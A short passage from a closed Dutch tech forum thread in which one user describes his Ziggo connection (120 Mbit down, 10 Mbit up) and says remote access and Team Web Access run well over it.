Verwijderd

Nood breekt wet! :+

• Alex)
Verwijderd schreef op maandag 22 november 2010 @ 19:50:
[...]

maar wil het nog wel een beetje snel werken via internet ?
Ik heb thuis een lijn liggen met bijna 10 Mbit upstream, werkt echt wel lekker (Ziggo Alles-in-één extra: 120 Mbit down, 10 Mbit up). Ook de web interface (Team Web Access) doet het als een zonnetje.

Pagina: 1 ... 81 ... 201 Laatste

Dit topic is gesloten.

Let op:
Dit topic is niet de plaats om te lopen helpdesken. De Coffee Corner is primair bedoeld als uitlaatklep, niet als vraagbaak